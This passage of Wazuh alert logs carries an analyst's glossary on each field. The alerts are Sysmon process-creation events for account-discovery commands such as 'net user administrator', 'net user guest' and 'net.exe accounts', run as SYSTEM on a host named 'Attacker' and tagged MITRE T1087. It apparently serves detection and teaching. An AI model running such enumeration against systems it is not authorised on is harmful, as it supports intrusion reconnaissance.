data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534571.2307087 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.7162743Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291105 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.711
ProcessGuid: {94294ddc-be63-680a-2e0c-000000000e00}
ProcessId: 9352
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be63-680a-2c0c-000000000e00}
ParentProcessId: 8956
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user administrator
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.711 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-2e0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9352 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be63-680a-2c0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8956 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534572.2312224 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.9493907Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291127 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.946
ProcessGuid: {94294ddc-be63-680a-2f0c-000000000e00}
ProcessId: 13660
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.946 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-2f0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13660 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 16 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534572.2317475 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:44.0502982Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291130 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:44.044
ProcessGuid: {94294ddc-be64-680a-310c-000000000e00}
ProcessId: 4256
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be63-680a-2f0c-000000000e00}
ParentProcessId: 13660
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user guest
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:44.044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be64-680a-310c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4256 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be63-680a-2f0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13660 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 25 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534572.2322552 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:44.0939500Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291133 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:44.091
ProcessGuid: {94294ddc-be64-680a-320c-000000000e00}
ProcessId: 10704
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:44.091 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be64-680a-320c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10704 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 26 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534575.2327789 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:46.4773051Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291351 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
